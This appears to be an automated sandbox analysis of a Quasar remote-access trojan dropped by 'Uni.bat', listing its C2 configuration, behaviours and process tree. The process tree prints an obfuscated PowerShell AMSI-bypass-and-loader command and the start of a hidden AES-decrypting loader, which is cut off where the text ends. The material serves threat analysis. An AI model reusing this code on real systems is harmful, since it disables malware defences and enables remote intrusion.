Analysis
max time kernel: 150s
max time network: 153s
platform: windows11-21h2_x64
resource: win11-20240426-en
resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 14-05-2024 23:05
Static task: static1
Behavioral task: behavioral1 (sample: Uni.bat, resource: win10-20240404-en)
Behavioral task: behavioral2 (sample: Uni.bat, resource: win7-20240215-en)
Behavioral task: behavioral3 (sample: Uni.bat, resource: win10v2004-20240426-en)
General
Target: Uni.bat
Size: 515KB
MD5: 4c2a3be3d5c9464eb441677e41f44fd8
SHA1: c826034a0882d21a39056d745e88622ee9698343
SHA256: 45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7
SHA512: ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c
SSDEEP: 12288:OOCZeIh9XQFAbCbtqTUGLYPSow/QWEO2b:4zh9+3tZGEw/b2b
Malware Config
Extracted
Family: quasar
Version: 3.1.5
Botnet: SLAVE
C2: review-tops.gl.at.ply.gg:48212
Mutex: $Sxr-IGnkORFTlshRl7BdTw
encryption_key: YDmRBA8wExjQkYgGrHhN
install_name: $sxr-powershell.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: Discord
subdirectory: $77
Signatures

Quasar payload (IoCs: 1)
resource | yara_rule
behavioral4/memory/480-73-0x0000000007380000-0x00000000073EC000-memory.dmp | family_quasar
Suspicious use of NtCreateUserProcessOtherParentProcess (IoCs: 1)
description | pid | process | target process
PID 2644 created 644 | 2644 | powershell.EXE | winlogon.exe
Blocklisted process makes network request (IoCs: 3)
flow | pid | process
2 | 480 | powershell.exe
4 | 480 | powershell.exe
5 | 480 | powershell.exe
Command and Scripting Interpreter: PowerShell (TTPs: 1, IoCs: 3)
Run Powershell and hide display window.
pid | process
480 | powershell.exe
3552 | powershell.exe
3276 | powershell.exe
Executes dropped EXE (IoCs: 2)
pid | process
5060 | $sxr-powershell.exe
244 | install.exe
Legitimate hosting services abused for malware hosting/C2 (TTPs: 1, IoCs: 2)
Looks up external IP address via web service (IoCs: 1)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
1 | ip-api.com
Drops file in System32 directory (IoCs: 5)
description | ioc | process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
Suspicious use of SetThreadContext (IoCs: 1)
description | pid | process | target process
PID 2644 set thread context of 1156 | 2644 | powershell.EXE | dllhost.exe
Enumerates physical storage devices (TTPs: 1)
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) (TTPs: 1, IoCs: 1)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Modifies data under HKEY_USERS (IoCs: 55)
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715728046" | OfficeClickToRun.exe
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={DA4A53E1-FE86-4F0F-B330-24C883B334B2}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 14 May 2024 23:07:27 GMT" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Modifies registry class (IoCs: 1)
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000_Classes\Local Settings | powershell.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses (IoCs: 64)
pid | process
3552 | powershell.exe (2 rows)
3276 | powershell.exe (2 rows)
480 | powershell.exe (2 rows)
5060 | $sxr-powershell.exe (2 rows)
2644 | powershell.EXE (3 rows)
1156 | dllhost.exe (the remaining 53 of the 64 rows)
Suspicious use of AdjustPrivilegeToken (IoCs: 64)
description | pid | process
Token: SeDebugPrivilege | 3552 | powershell.exe
Token: SeDebugPrivilege | 3276 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 3276 | powershell.exe
Token: SeSecurityPrivilege | 3276 | powershell.exe
Token: SeTakeOwnershipPrivilege | 3276 | powershell.exe
Token: SeLoadDriverPrivilege | 3276 | powershell.exe
Token: SeSystemProfilePrivilege | 3276 | powershell.exe
Token: SeSystemtimePrivilege | 3276 | powershell.exe
Token: SeProfSingleProcessPrivilege | 3276 | powershell.exe
Token: SeIncBasePriorityPrivilege | 3276 | powershell.exe
Token: SeCreatePagefilePrivilege | 3276 | powershell.exe
Token: SeBackupPrivilege | 3276 | powershell.exe
Token: SeRestorePrivilege | 3276 | powershell.exe
Token: SeShutdownPrivilege | 3276 | powershell.exe
Token: SeDebugPrivilege | 3276 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 3276 | powershell.exe
Token: SeRemoteShutdownPrivilege | 3276 | powershell.exe
Token: SeUndockPrivilege | 3276 | powershell.exe
Token: SeManageVolumePrivilege | 3276 | powershell.exe
Token: 33 | 3276 | powershell.exe
Token: 34 | 3276 | powershell.exe
Token: 35 | 3276 | powershell.exe
Token: 36 | 3276 | powershell.exe
(The 21-row sequence from Token: SeIncreaseQuotaPrivilege to Token: 36 appears three times in a row for pid 3276; the third copy stops at Token: 35, which is the table's 64th row.)
Suspicious use of WriteProcessMemory (IoCs: 64)
description | pid | process | target process
PID 3056 wrote to memory of 2740 | 3056 | cmd.exe | net.exe (2 rows)
PID 2740 wrote to memory of 3492 | 2740 | net.exe | net1.exe (2 rows)
PID 3056 wrote to memory of 3552 | 3056 | cmd.exe | powershell.exe (3 rows)
PID 3552 wrote to memory of 3276 | 3552 | powershell.exe | powershell.exe (3 rows)
PID 3552 wrote to memory of 8 | 3552 | powershell.exe | WScript.exe (3 rows)
PID 8 wrote to memory of 2876 | 8 | WScript.exe | cmd.exe (3 rows)
PID 2876 wrote to memory of 4792 | 2876 | cmd.exe | net.exe (3 rows)
PID 4792 wrote to memory of 2008 | 4792 | net.exe | net1.exe (3 rows)
PID 2876 wrote to memory of 480 | 2876 | cmd.exe | powershell.exe (3 rows)
PID 480 wrote to memory of 4744 | 480 | powershell.exe | schtasks.exe (3 rows)
PID 480 wrote to memory of 5060 | 480 | powershell.exe | $sxr-powershell.exe (3 rows)
PID 480 wrote to memory of 244 | 480 | powershell.exe | install.exe (3 rows)
PID 2644 wrote to memory of 1156 | 2644 | powershell.EXE | dllhost.exe (8 rows)
PID 1156 wrote to memory of 644 | 1156 | dllhost.exe | winlogon.exe
PID 1156 wrote to memory of 700 | 1156 | dllhost.exe | lsass.exe
PID 1156 wrote to memory of 996 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 436 | 1156 | dllhost.exe | dwm.exe
PID 1156 wrote to memory of 460 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 416 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1040 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1060 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1100 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1216 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1252 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1308 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1360 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1396 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1428 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1472 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1496 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1664 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1708 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1748 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1756 | 1156 | dllhost.exe | svchost.exe
PID 1156 wrote to memory of 1844 | 1156 | dllhost.exe | svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:644
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:436
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3d293ea8-3858-44ad-bcc9-9f98bbd867ae}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1156
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:460
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:416
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gvDVrbVNbelO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZRhNPvmbYtFmMR,[Parameter(Position=1)][Type]$xuiWXuSEHt)$LAAYmLRettP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'tedD'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+[Char](101)+''+'m'+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+'e'+'T'+''+[Char](121)+''+[Char](112)+''+'e'+'',''+'C'+'l'+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$LAAYmLRettP.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+'e'+'c'+'i'+''+'a'+'l'+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$ZRhNPvmbYtFmMR).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'na'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$LAAYmLRettP.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+'k'+''+'e'+'','P'+'u'+''+[Char](98)+'l'+[Char](105)
+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'deBy'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'ew'+[Char](83)+'l'+'o'+''+'t'+',V'+'i'+''+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+'',$xuiWXuSEHt,$ZRhNPvmbYtFmMR).SetImplementationFlags(''+'R'+''+[Char](117)+'nt'+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $LAAYmLRettP.CreateType();}$ePtTIHkyhOuYn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+'dl'+'l'+'')}).GetType('Mic'+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'Win'+'3'+'2'+[Char](46)+'Uns'+'a'+''+[Char](102)+'e'+'N'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+'eM'+[Char](101)+'t'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$pbbugAOWrjszIp=$ePtTIHkyhOuYn.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gvaflfonItCtTVaAdLp=gvDVrbVNbelO @([String])([IntPtr]);$stLbebnzurNRbTNHGzQwQM=gvDVrbVNbelO 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ZWUjVVOCYrA=$ePtTIHkyhOuYn.GetMethod(''+'G'+'et'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'eH'+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ZIiBEnEwJgBaMP=$pbbugAOWrjszIp.Invoke($Null,@([Object]$ZWUjVVOCYrA,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+'A')));$xxypUFDLXWklvNWZS=$pbbugAOWrjszIp.Invoke($Null,@([Object]$ZWUjVVOCYrA,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+'te'+'c'+''+'t'+'')));$tWIAwJz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZIiBEnEwJgBaMP,$gvaflfonItCtTVaAdLp).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$jDHOaNrHqDHLOdmNd=$pbbugAOWrjszIp.Invoke($Null,@([Object]$tWIAwJz,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+'u'+'f'+[Char](102)+'er')));$HQzkNVLxWZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xxypUFDLXWklvNWZS,$stLbebnzurNRbTNHGzQwQM).Invoke($jDHOaNrHqDHLOdmNd,[uint32]8,4,[ref]$HQzkNVLxWZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jDHOaNrHqDHLOdmNd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xxypUFDLXWklvNWZS,$stLbebnzurNRbTNHGzQwQM).Invoke($jDHOaNrHqDHLOdmNd,[uint32]8,0x20,[ref]$HQzkNVLxWZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2644
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1252
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1360
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1428
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1472
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1664
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1748
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1920
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2036
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2148
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2572
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2584
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:696
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2136
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3324
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\system32\net.exenet file3⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file4⤵PID:3492
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object 